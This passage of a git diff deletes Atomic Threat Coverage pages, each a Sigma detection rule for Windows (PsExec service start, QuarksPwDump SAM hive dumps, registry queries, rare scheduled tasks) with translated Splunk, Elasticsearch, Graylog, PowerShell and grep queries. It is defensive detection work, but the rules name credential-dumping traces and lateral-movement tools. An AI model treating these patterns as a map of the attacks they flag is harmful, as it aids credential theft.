-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:*IPC* AND RelativeTargetName:\"protected_storage\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Protected Storage Service Access'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5145" AND ShareName.keyword:*IPC* AND RelativeTargetName:"protected_storage")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5145" ShareName="*IPC*" RelativeTargetName="protected_storage")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5145" ShareName="*IPC*" RelativeTargetName="protected_storage")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5145)(?=.*.*IPC.*)(?=.*protected_storage))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_psexesvc_start.md b/Atomic_Threat_Coverage/Detection_Rules/win_psexesvc_start.md
deleted file mode 100644
index 3641758..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_psexesvc_start.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | PsExec Service Start       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a PsExec service start |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1035: Service Execution](https://attack.mitre.org/techniques/T1035)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Administrative activity</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0029</li><li>attack.t1569.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PsExec Service Start
-id: 3ede524d-21cc-472d-a3ce-d21b568d8db7
-description: Detects a PsExec service start
-author: Florian Roth
-date: 2018/03/13
-modified: 2012/12/11
-tags:
-    - attack.execution
-    - attack.t1035
-    - attack.s0029
-    - attack.t1569.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: C:\Windows\PSEXESVC.exe
-    condition: selection
-falsepositives:
-    - Administrative activity
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*C:\\Windows\\PSEXESVC.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine:"C\:\\Windows\\PSEXESVC.exe"
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3ede524d-21cc-472d-a3ce-d21b568d8db7 <<EOF
-{
-  "metadata": {
-    "title": "PsExec Service Start",
-    "description": "Detects a PsExec service start",
-    "tags": [
-      "attack.execution",
-      "attack.t1035",
-      "attack.s0029",
-      "attack.t1569.002"
-    ],
-    "query": "winlog.event_data.CommandLine:\"C\\:\\\\Windows\\\\PSEXESVC.exe\""
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine:\"C\\:\\\\Windows\\\\PSEXESVC.exe\"",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PsExec Service Start'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine:"C\:\\Windows\\PSEXESVC.exe"
-```
-
-
-### splunk
-    
-```
-CommandLine="C:\\Windows\\PSEXESVC.exe"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="C:\\Windows\\PSEXESVC.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^C:\Windows\PSEXESVC\.exe'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_quarkspwdump_clearing_hive_access_history.md b/Atomic_Threat_Coverage/Detection_Rules/win_quarkspwdump_clearing_hive_access_history.md
deleted file mode 100644
index 7617a86..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_quarkspwdump_clearing_hive_access_history.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | QuarksPwDump Clearing Access History       |
-|:-------------------------|:------------------|
-| **Description**          | Detects QuarksPwDump clearing access history in hive |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1003.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: QuarksPwDump Clearing Access History
-id: 39f919f3-980b-4e6f-a975-8af7e507ef2b
-status: experimental
-description: Detects QuarksPwDump clearing access history in hive
-author: Florian Roth
-date: 2017/05/15
-modified: 2019/11/13
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-level: critical
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 16
-        HiveName|contains: '\AppData\Local\Temp\SAM'
-        HiveName|endswith: '.dmp'
-    condition: selection
-falsepositives:
-    - Unknown
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "16" -and $_.message -match "HiveName.*.*\\AppData\\Local\\Temp\\SAM.*" -and $_.message -match "HiveName.*.*.dmp") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"16" AND winlog.event_data.HiveName.keyword:*\\AppData\\Local\\Temp\\SAM* AND winlog.event_data.HiveName.keyword:*.dmp)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/39f919f3-980b-4e6f-a975-8af7e507ef2b <<EOF
-{
-  "metadata": {
-    "title": "QuarksPwDump Clearing Access History",
-    "description": "Detects QuarksPwDump clearing access history in hive",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002"
-    ],
-    "query": "(winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* AND winlog.event_data.HiveName.keyword:*.dmp)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* AND winlog.event_data.HiveName.keyword:*.dmp)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'QuarksPwDump Clearing Access History'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"16" AND HiveName.keyword:*\\AppData\\Local\\Temp\\SAM* AND HiveName.keyword:*.dmp)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="16" HiveName="*\\AppData\\Local\\Temp\\SAM*" HiveName="*.dmp")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="16" HiveName="*\\AppData\\Local\\Temp\\SAM*" HiveName="*.dmp")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*16)(?=.*.*\AppData\Local\Temp\SAM.*)(?=.*.*\.dmp))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_query_registry.md b/Atomic_Threat_Coverage/Detection_Rules/win_query_registry.md
deleted file mode 100644
index 72cfcae..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_query_registry.md
+++ /dev/null
@@ -1,197 +0,0 @@
-| Title                    | Query Registry       |
-|:-------------------------|:------------------|
-| **Description**          | Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1012: Query Registry](https://attack.mitre.org/techniques/T1012)</li><li>[T1007: System Service Discovery](https://attack.mitre.org/techniques/T1007)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1012: Query Registry](../Triggers/T1012.md)</li><li>[T1007: System Service Discovery](../Triggers/T1007.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Query Registry
-id: 970007b7-ce32-49d0-a4a4-fbef016950bd
-status: experimental
-description: Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
-author: Timur Zinniatullin, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.yaml
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-        Image|endswith: '\reg.exe'
-        CommandLine|contains: 
-            - 'query'
-            - 'save'
-            - 'export'
-    selection_2:
-        CommandLine|contains:
-            - 'currentVersion\windows'
-            - 'currentVersion\runServicesOnce'
-            - 'currentVersion\runServices'
-            - 'winlogon\'
-            - 'currentVersion\shellServiceObjectDelayLoad'
-            - 'currentVersion\runOnce'
-            - 'currentVersion\runOnceEx'
-            - 'currentVersion\run'
-            - 'currentVersion\policies\explorer\run'
-            - 'currentcontrolset\services'
-    condition: selection_1 and selection_2
-fields:
-    - Image
-    - CommandLine
-    - User
-    - LogonGuid
-    - Hashes
-    - ParentProcessGuid
-    - ParentCommandLine
-level: low
-tags:
-    - attack.discovery
-    - attack.t1012
-    - attack.t1007
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\reg.exe" -and ($_.message -match "CommandLine.*.*query.*" -or $_.message -match "CommandLine.*.*save.*" -or $_.message -match "CommandLine.*.*export.*") -and ($_.message -match "CommandLine.*.*currentVersion\\windows.*" -or $_.message -match "CommandLine.*.*currentVersion\\runServicesOnce.*" -or $_.message -match "CommandLine.*.*currentVersion\\runServices.*" -or $_.message -match "CommandLine.*.*winlogon\\.*" -or $_.message -match "CommandLine.*.*currentVersion\\shellServiceObjectDelayLoad.*" -or $_.message -match "CommandLine.*.*currentVersion\\runOnce.*" -or $_.message -match "CommandLine.*.*currentVersion\\runOnceEx.*" -or $_.message -match "CommandLine.*.*currentVersion\\run.*" -or $_.message -match "CommandLine.*.*currentVersion\\policies\\explorer\\run.*" -or $_.message -match "CommandLine.*.*currentcontrolset\\services.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\reg.exe AND winlog.event_data.CommandLine.keyword:(*query* OR *save* OR *export*) AND winlog.event_data.CommandLine.keyword:(*currentVersion\\windows* OR *currentVersion\\runServicesOnce* OR *currentVersion\\runServices* OR *winlogon\\* OR *currentVersion\\shellServiceObjectDelayLoad* OR *currentVersion\\runOnce* OR *currentVersion\\runOnceEx* OR *currentVersion\\run* OR *currentVersion\\policies\\explorer\\run* OR *currentcontrolset\\services*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/970007b7-ce32-49d0-a4a4-fbef016950bd <<EOF
-{
-  "metadata": {
-    "title": "Query Registry",
-    "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.",
-    "tags": [
-      "attack.discovery",
-      "attack.t1012",
-      "attack.t1007"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\reg.exe AND winlog.event_data.CommandLine.keyword:(*query* OR *save* OR *export*) AND winlog.event_data.CommandLine.keyword:(*currentVersion\\\\windows* OR *currentVersion\\\\runServicesOnce* OR *currentVersion\\\\runServices* OR *winlogon\\\\* OR *currentVersion\\\\shellServiceObjectDelayLoad* OR *currentVersion\\\\runOnce* OR *currentVersion\\\\runOnceEx* OR *currentVersion\\\\run* OR *currentVersion\\\\policies\\\\explorer\\\\run* OR *currentcontrolset\\\\services*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\reg.exe AND winlog.event_data.CommandLine.keyword:(*query* OR *save* OR *export*) AND winlog.event_data.CommandLine.keyword:(*currentVersion\\\\windows* OR *currentVersion\\\\runServicesOnce* OR *currentVersion\\\\runServices* OR *winlogon\\\\* OR *currentVersion\\\\shellServiceObjectDelayLoad* OR *currentVersion\\\\runOnce* OR *currentVersion\\\\runOnceEx* OR *currentVersion\\\\run* OR *currentVersion\\\\policies\\\\explorer\\\\run* OR *currentcontrolset\\\\services*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Query Registry'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n            Image = {{_source.Image}}\n      CommandLine = {{_source.CommandLine}}\n             User = {{_source.User}}\n        LogonGuid = {{_source.LogonGuid}}\n           Hashes = {{_source.Hashes}}\nParentProcessGuid = {{_source.ParentProcessGuid}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\reg.exe AND CommandLine.keyword:(*query* *save* *export*) AND CommandLine.keyword:(*currentVersion\\windows* *currentVersion\\runServicesOnce* *currentVersion\\runServices* *winlogon\\* *currentVersion\\shellServiceObjectDelayLoad* *currentVersion\\runOnce* *currentVersion\\runOnceEx* *currentVersion\\run* *currentVersion\\policies\\explorer\\run* *currentcontrolset\\services*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\reg.exe" (CommandLine="*query*" OR CommandLine="*save*" OR CommandLine="*export*") (CommandLine="*currentVersion\\windows*" OR CommandLine="*currentVersion\\runServicesOnce*" OR CommandLine="*currentVersion\\runServices*" OR CommandLine="*winlogon\\*" OR CommandLine="*currentVersion\\shellServiceObjectDelayLoad*" OR CommandLine="*currentVersion\\runOnce*" OR CommandLine="*currentVersion\\runOnceEx*" OR CommandLine="*currentVersion\\run*" OR CommandLine="*currentVersion\\policies\\explorer\\run*" OR CommandLine="*currentcontrolset\\services*")) | table Image,CommandLine,User,LogonGuid,Hashes,ParentProcessGuid,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\reg.exe" CommandLine IN ["*query*", "*save*", "*export*"] CommandLine IN ["*currentVersion\\windows*", "*currentVersion\\runServicesOnce*", "*currentVersion\\runServices*", "*winlogon\\*", "*currentVersion\\shellServiceObjectDelayLoad*", "*currentVersion\\runOnce*", "*currentVersion\\runOnceEx*", "*currentVersion\\run*", "*currentVersion\\policies\\explorer\\run*", "*currentcontrolset\\services*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\reg\.exe)(?=.*(?:.*.*query.*|.*.*save.*|.*.*export.*))(?=.*(?:.*.*currentVersion\windows.*|.*.*currentVersion\runServicesOnce.*|.*.*currentVersion\runServices.*|.*.*winlogon\\.*|.*.*currentVersion\shellServiceObjectDelayLoad.*|.*.*currentVersion\runOnce.*|.*.*currentVersion\runOnceEx.*|.*.*currentVersion\run.*|.*.*currentVersion\policies\explorer\run.*|.*.*currentcontrolset\services.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md b/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
deleted file mode 100644
index 56cc375..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | Rare Scheduled Task Creations       |
-|:-------------------------|:------------------|
-| **Description**          | This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Software installation</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0111</li><li>attack.t1053.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Rare Scheduled Task Creations
-id: b20f6158-9438-41be-83da-a5a16ac90c2b
-status: experimental
-description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
-tags:
-    - attack.persistence
-    - attack.t1053
-    - attack.s0111
-    - attack.t1053.005
-author: Florian Roth
-date: 2017/03/17
-logsource:
-    product: windows
-    service: taskscheduler
-detection:
-    selection:
-        EventID: 106
-    timeframe: 7d
-    condition: selection | count() by TaskName < 5
-falsepositives:
-    - Software installation
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-TaskScheduler/Operational | where {($_.ID -eq "106") }  | group-object TaskName | where { $_.count -lt 5 } | select name,count | sort -desc
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/other/win_rare_schtask_creation.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b20f6158-9438-41be-83da-a5a16ac90c2b <<EOF
-{
-  "metadata": {
-    "title": "Rare Scheduled Task Creations",
-    "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1053",
-      "attack.s0111",
-      "attack.t1053.005"
-    ],
-    "query": "winlog.event_id:\"106\""
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "7d"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_id:\"106\"",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "TaskName",
-                "size": 10,
-                "order": {
-                  "_count": "asc"
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.doc_count": {
-        "lt": 5
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Rare Scheduled Task Creations'",
-        "body": "Hits:\n{{#aggregations.by.buckets}}\n {{key}} {{doc_count}}\n{{/aggregations.by.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/other/win_rare_schtask_creation.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-TaskScheduler/Operational" EventCode="106") | eventstats count as val by TaskName| search val < 5
-```
-
-
-### logpoint
-    
-```
-event_id="106" | chart count() as val by TaskName | search val < 5
-```
-
-
-### grep
-    
-```
-grep -P '^106'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtasks_creations.md b/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtasks_creations.md
deleted file mode 100644
index 4ff1904..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rare_schtasks_creations.md
+++ /dev/null
@@ -1,194 +0,0 @@
-| Title                    | Rare Schtasks Creations       |
-|:-------------------------|:------------------|
-| **Description**          | Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Software installation</li><li>Software updates</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-08-001</li><li>attack.t1053.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Rare Schtasks Creations
-id: b0d77106-7bb0-41fe-bd94-d1752164d066
-description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
-status: experimental
-author: Florian Roth
-date: 2017/03/23
-tags:
-    - attack.execution
-    - attack.privilege_escalation
-    - attack.persistence
-    - attack.t1053
-    - car.2013-08-001
-    - attack.t1053.005
-logsource:
-    product: windows
-    service: security
-    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). We also recommend extracting the Command field from the embedded XML in the event data.'
-detection:
-    selection:
-        EventID: 4698
-    timeframe: 7d
-    condition: selection | count() by TaskName < 5
-falsepositives:
-    - Software installation
-    - Software updates
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4698") }  | group-object TaskName | where { $_.count -lt 5 } | select name,count | sort -desc
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_rare_schtasks_creations.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b0d77106-7bb0-41fe-bd94-d1752164d066 <<EOF
-{
-  "metadata": {
-    "title": "Rare Schtasks Creations",
-    "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code",
-    "tags": [
-      "attack.execution",
-      "attack.privilege_escalation",
-      "attack.persistence",
-      "attack.t1053",
-      "car.2013-08-001",
-      "attack.t1053.005"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "7d"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "TaskName",
-                "size": 10,
-                "order": {
-                  "_count": "asc"
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.doc_count": {
-        "lt": 5
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Rare Schtasks Creations'",
-        "body": "Hits:\n{{#aggregations.by.buckets}}\n {{key}} {{doc_count}}\n{{/aggregations.by.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_rare_schtasks_creations.yml): Aggregations not implemented for this backend
